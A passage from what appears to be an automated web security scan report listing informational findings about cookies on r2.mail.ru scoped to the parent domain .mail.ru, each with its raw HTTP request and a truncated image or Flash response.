Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 3621
Connection: keep-alive
Set-Cookie: p=L/YGAE2r7QAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................<.<..
...[SNIP]...

15.67. http://r2.mail.ru/b12887677.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12887677.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=AtoGAEnndQAA; expires=Wed, 24-Apr-13 14:21:35 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12887677.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:35 GMT
Content-Type: image/jpeg
Content-Length: 3066
Connection: keep-alive
Set-Cookie: p=AtoGAEnndQAA; expires=Wed, 24-Apr-13 14:21:35 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:35 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . ........................................................<.<..
...[SNIP]...

15.68. http://r2.mail.ru/b12961140.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12961140.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=wfsGAFqt5gAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12961140.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:36 GMT
Content-Type: image/jpeg
Content-Length: 2105
Connection: keep-alive
Set-Cookie: p=wfsGAFqt5gAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:36 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!22222222222222222222222222222222222222222222222222......D.Z.."..............................
...[SNIP]...

15.69. http://r2.mail.ru/b12961154.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12961154.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=XOcGAEiT0QAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12961154.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:36 GMT
Content-Type: image/jpeg
Content-Length: 1321
Connection: keep-alive
Set-Cookie: p=XOcGAEiT0QAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:36 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!22222222222222222222222222222222222222222222222222......D.Z.."..............................
...[SNIP]...

15.70. http://r2.mail.ru/b12961373.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12961373.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=0+oGAFLrEgAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12961373.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:36 GMT
Content-Type: image/jpeg
Content-Length: 2341
Connection: keep-alive
Set-Cookie: p=0+oGAFLrEgAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:36 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C....... .. ..........................................................D.Z.."..............................
...[SNIP]...

15.71. http://r2.mail.ru/b12962356.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12962356.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=BPIGAGGvrgAA; expires=Wed, 24-Apr-13 14:21:29 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12962356.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:29 GMT
Content-Type: image/jpeg
Content-Length: 2232
Connection: keep-alive
Set-Cookie: p=BPIGAGGvrgAA; expires=Wed, 24-Apr-13 14:21:29 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:29 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!22222222222222222222222222222222222222222222222222......<.P.."..............................
...[SNIP]...

15.72. http://r2.mail.ru/b12963308.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12963308.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=k+8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12963308.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 1983
Connection: keep-alive
Set-Cookie: p=k+8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!22222222222222222222222222222222222222222222222222......<.P.."..............................
...[SNIP]...

15.73. http://r2.mail.ru/b12965362.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12965362.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=cuoGAFLrEgAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12965362.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 1986
Connection: keep-alive
Set-Cookie: p=cuoGAFLrEgAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!22222222222222222222222222222222222222222222222222......<.P.."..............................
...[SNIP]...

15.74. http://r2.mail.ru/b12968616.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12968616.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=+dsGAErbVQAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12968616.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:34 GMT
Content-Type: image/jpeg
Content-Length: 7638
Connection: keep-alive
Set-Cookie: p=+dsGAErbVQAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:34 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......Exif..II*.................Ducky.......d.....)http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...

15.75. http://r2.mail.ru/b12979027.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12979027.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=y6YGAFbDNQAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12979027.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 2333
Connection: keep-alive
Set-Cookie: p=y6YGAFbDNQAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....,.,.....C......................
.....
...
.................................C....... .. ..........................................................<.<.................................
...[SNIP]...

15.76. http://r2.mail.ru/b13039712.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13039712.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=9doGAErbVQAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13039712.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:15 GMT
Content-Type: image/jpeg
Content-Length: 1491
Connection: keep-alive
Set-Cookie: p=9doGAErbVQAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:15 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C......................... ....................!........."$".$.......C..............................................
...[SNIP]...

15.77. http://r2.mail.ru/b13044176.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13044176.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=JAEHAEmt3gAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13044176.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 2252
Connection: keep-alive
Set-Cookie: p=JAEHAEmt3gAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:23 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d.....C.................................... . ..
...

...... ...........C.......................................................................2.2.."..............................
...[SNIP]...

15.78. http://r2.mail.ru/b13049054.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13049054.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=CeQGAEjl4gAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13049054.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/jpeg
Content-Length: 19587
Connection: keep-alive
Set-Cookie: p=CeQGAEjl4gAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H....
FExif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2011:04:18 20:39:59.........
...[SNIP]...

15.79. http://r2.mail.ru/b13050852.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13050852.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=ZvYGAEidmwAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13050852.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/jpeg
Content-Length: 15500
Connection: keep-alive
Set-Cookie: p=ZvYGAEidmwAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....TExif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2011:04:18 20:43:30.........
...[SNIP]...

15.80. http://r2.mail.ru/b13057590.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13057590.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=1vsGAEvDVAAA; expires=Wed, 24-Apr-13 14:29:52 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13057590.swf HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:29:52 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 21720
Connection: keep-alive
Set-Cookie: p=1vsGAEvDVAAA; expires=Wed, 24-Apr-13 14:29:52 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:29:52 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

CWS .x..x...u\U].7.N.-]...t..HwHs...i.)..QBP.AZ..D.E..T@QJE.l.....u...<...>...q..f......Y........p...`@..@?'.......".b.............0...a..A.h....S.u1.....P.....#..1....}... U]....... ....'.........
...[SNIP]...

15.81. http://r2.mail.ru/b13058787.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13058787.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=9okGAHCbTwAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13058787.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 3168
Connection: keep-alive
Set-Cookie: p=9okGAHCbTwAA; expires=Wed, 24-Apr-13 14:21:23 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:23 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 95
...C..................................... ... ......

.....
.

...C...........
...

...[SNIP]...

15.82. http://r2.mail.ru/b13058840.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b13058840.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p=G+0GAEqHxAAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b13058840.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
